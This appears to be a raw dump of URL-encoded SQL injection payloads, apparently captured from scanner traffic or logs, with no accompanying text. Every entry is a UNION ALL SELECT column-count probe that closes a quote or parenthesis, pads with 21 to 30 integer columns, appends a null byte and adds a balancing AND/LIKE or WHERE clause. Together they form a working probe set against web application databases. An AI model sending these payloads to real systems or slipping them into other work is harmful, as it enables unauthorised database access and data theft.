-7250%22%20UNION%20ALL%20SELECT%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%2C%201112%00%20AND%20%22rhSQ%22%3D%22rhSQ -5686%22%20UNION%20ALL%20SELECT%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%2C%203642%00%20AND%20%22kDof%22%3D%22kDof -5330%22%20UNION%20ALL%20SELECT%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%00%20AND%20%22hcXR%22%3D%22hcXR -1444%22%20UNION%20ALL%20SELECT%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%2C%203956%00%20AND%20%22koNj%22%3D%22koNj -2650%22%29%20UNION%20ALL%20SELECT%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%2C%207756%00%20AND%20%28%22LZnv%22%20LIKE%20%22LZnv -5744%22%29%20UNION%20ALL%20SELECT%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%2C%209345%00%20AND%20%28%22unll%22%20LIKE%20%22unll -9378%22%29%20UNION%20ALL%20SELECT%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%2C%202812%00%20AND%20%28%22YbsM%22%20LIKE%20%22YbsM -2256%22%29%20UNION%20ALL%20SELECT%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%2C%207703%00%20AND%20%28%22tVLm%22%20LIKE%20%22tVLm -3067%22%29%20UNION%20ALL%20SELECT%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%2C%203013%00%20AND%20%28%22SDrB%22%20LIKE%20%22SDrB -6128%22%29%20UNION%20ALL%20SELECT%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%00%20AND%20%28%22ievy%22%20LIKE%20%22ievy -8255%22%29%20UNION%20ALL%20SELECT%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%2C%206200%00%20AND%20%28%22nMAf%22%20LIKE%20%22nMAf -6883%22%29%20UNION%20ALL%20SELECT%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%2C%203944%00%20AND%20%28%22GzEA%22%20LIKE%20%22GzEA -1995%22%29%20UNION%20ALL%20SELECT%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%2C%207153%00%20AND%20%28%22UbPy%22%20LIKE%20%22UbPy -5521%22%29%20UNION%20ALL%20SELECT%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%00%20AND%20%28%22UUHi%22%20LIKE%20%22UUHi -7204%22%29%29%20UNION%20ALL%20SELECT%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%2C%201791%00%20AND%20%28%28%22iJRP%22%20LIKE%20%22iJRP -3163%22%29%29%20UNION%20ALL%20SELECT%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%00%20AND%20%28%28%22xCti%22%20LIKE%20%22xCti -3172%22%29%29%20UNION%20ALL%20SELECT%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%00%20AND%20%28%28%22ZkFu%22%20LIKE%20%22ZkFu -9785%22%29%29%20UNION%20ALL%20SELECT%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%2C%207120%00%20AND%20%28%28%22xyvK%22%20LIKE%20%22xyvK -1775%22%29%29%20UNION%20ALL%20SELECT%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%00%20AND%20%28%28%22AOMg%22%20LIKE%20%22AOMg -3407%22%29%29%20UNION%20ALL%20SELECT%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%2C%201333%00%20AND%20%28%28%22oHqP%22%20LIKE%20%22oHqP -6922%22%29%29%20UNION%20ALL%20SELECT%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%2C%205282%00%20AND%20%28%28%22veIk%22%20LIKE%20%22veIk -2038%22%29%29%20UNION%20ALL%20SELECT%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%2C%202695%00%20AND%20%28%28%22SGxl%22%20LIKE%20%22SGxl -5112%22%29%29%20UNION%20ALL%20SELECT%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%2C%205734%00%20AND%20%28%28%22GZtA%22%20LIKE%20%22GZtA -8610%22%29%29%20UNION%20ALL%20SELECT%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%2C%204729%00%20AND%20%28%28%22iLPo%22%20LIKE%20%22iLPo -2443%22%29%29%29%20UNION%20ALL%20SELECT%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%2C%206962%00%20AND%20%28%28%28%22nofC%22%20LIKE%20%22nofC -9951%22%29%29%29%20UNION%20ALL%20SELECT%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%00%20AND%20%28%28%28%22ovda%22%20LIKE%20%22ovda -1998%22%29%29%29%20UNION%20ALL%20SELECT%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%2C%208862%00%20AND%20%28%28%28%22EqMH%22%20LIKE%20%22EqMH -1104%22%29%29%29%20UNION%20ALL%20SELECT%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%00%20AND%20%28%28%28%22TrVv%22%20LIKE%20%22TrVv -4245%22%29%29%29%20UNION%20ALL%20SELECT%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%00%20AND%20%28%28%28%22iCXt%22%20LIKE%20%22iCXt -3538%22%29%29%29%20UNION%20ALL%20SELECT%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%2C%207466%00%20AND%20%28%28%28%22LZbx%22%20LIKE%20%22LZbx -2516%22%29%29%29%20UNION%20ALL%20SELECT%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%00%20AND%20%28%28%28%22cUIx%22%20LIKE%20%22cUIx -2832%22%29%29%29%20UNION%20ALL%20SELECT%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%00%20AND%20%28%28%28%22DCjr%22%20LIKE%20%22DCjr -2438%22%29%29%29%20UNION%20ALL%20SELECT%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%2C%205981%00%20AND%20%28%28%28%22ZNZt%22%20LIKE%20%22ZNZt -2642%22%29%29%29%20UNION%20ALL%20SELECT%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%2C%209239%00%20AND%20%28%28%28%22Xpld%22%20LIKE%20%22Xpld -1546%22%20UNION%20ALL%20SELECT%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%2C%203916%00%20AND%20%22QToH%22%20LIKE%20%22QToH -2763%22%20UNION%20ALL%20SELECT%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%00%20AND%20%22YKhW%22%20LIKE%20%22YKhW -4192%22%20UNION%20ALL%20SELECT%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%2C%203637%00%20AND%20%22ugmn%22%20LIKE%20%22ugmn -1409%22%20UNION%20ALL%20SELECT%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%2C%209035%00%20AND%20%22bTeV%22%20LIKE%20%22bTeV -4671%22%20UNION%20ALL%20SELECT%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%00%20AND%20%22pdAz%22%20LIKE%20%22pdAz -5928%22%20UNION%20ALL%20SELECT%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%00%20AND%20%22DtCG%22%20LIKE%20%22DtCG -6854%22%20UNION%20ALL%20SELECT%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%00%20AND%20%22CSVR%22%20LIKE%20%22CSVR -9758%22%20UNION%20ALL%20SELECT%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%2C%203932%00%20AND%20%22fyyo%22%20LIKE%20%22fyyo -6325%22%20UNION%20ALL%20SELECT%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%2C%206270%00%20AND%20%22WpKe%22%20LIKE%20%22WpKe -6851%22%20UNION%20ALL%20SELECT%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%2C%208056%00%20AND%20%22xfQu%22%20LIKE%20%22xfQu -5963%29%20WHERE%207084%3D7084%20UNION%20ALL%20SELECT%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%2C%207084%00 -8160%29%20WHERE%203174%3D3174%20UNION%20ALL%20SELECT%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%00 -3423%29%20WHERE%201642%3D1642%20UNION%20ALL%20SELECT%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%2C%201642%00 -6872%29%20WHERE%205129%3D5129%20UNION%20ALL%20SELECT%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%00 -7058%29%20WHERE%208277%3D8277%20UNION%20ALL%20SELECT%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%2C%208277%00 -2137%29%20WHERE%201996%3D1996%20UNION%20ALL%20SELECT%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%00 -8229%29%20WHERE%206811%3D6811%20UNION%20ALL%20SELECT%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%00 -3708%29%20WHERE%201448%3D1448%20UNION%20ALL%20SELECT%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%2C%201448%00 -5471%29%20WHERE%208308%3D8308%20UNION%20ALL%20SELECT%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%00 -8507%29%20WHERE%206563%3D6563%20UNION%20ALL%20SELECT%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%00 -3084%27%29%20WHERE%201155%3D1155%20UNION%20ALL%20SELECT%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%2C%201155%00 -6909%27%29%20WHERE%202233%3D2233%20UNION%20ALL%20SELECT%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%2C%202233%00 -7782%27%29%20WHERE%204110%3D4110%20UNION%20ALL%20SELECT%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%2C%204110%00 -8997%27%29%20WHERE%209338%3D9338%20UNION%20ALL%20SELECT%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%00 -5512%27%29%20WHERE%204026%3D4026%20UNION%20ALL%20SELECT%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%2C%204026%00 -5961%27%29%20WHERE%205937%3D5937%20UNION%20ALL%20SELECT%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%2C%205937%00 -3941%27%29%20WHERE%207467%3D7467%20UNION%20ALL%20SELECT%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%00 -5784%27%29%20WHERE%207392%3D7392%20UNION%20ALL%20SELECT%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%00 -2283%27%29%20WHERE%202900%3D2900%20UNION%20ALL%20SELECT%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%00 -5713%27%29%20WHERE%206201%3D6201%20UNION%20ALL%20SELECT%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%2C%206201%00 -6589%27%20WHERE%209502%3D9502%20UNION%20ALL%20SELECT%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%2C%209502%00 -7095%27%20WHERE%209742%3D9742%20UNION%20ALL%20SELECT%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%00 -1788%27%20WHERE%208149%3D8149%20UNION%20ALL%20SELECT%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%2C%208149%00 -5551%27%20WHERE%205790%3D5790%20UNION%20ALL%20SELECT%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%00 -1910%27%20WHERE%208521%3D8521%20UNION%20ALL%20SELECT%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%2C%208521%00 -3741%27%20WHERE%207593%3D7593%20UNION%20ALL%20SELECT%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%2C%207593%00 -8493%27%20WHERE%202419%3D2419%20UNION%20ALL%20SELECT%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%2C%202419%00 -8984%27%20WHERE%202951%3D2951%20UNION%20ALL%20SELECT%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%2C%202951%00 -4276%27%20WHERE%202145%3D2145%20UNION%20ALL%20SELECT%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%00 -9058%27%20WHERE%206708%3D6708%20UNION%20ALL%20SELECT%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%2C%206708%00 -4072%22%20WHERE%204149%3D4149%20UNION%20ALL%20SELECT%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%2C%204149%00 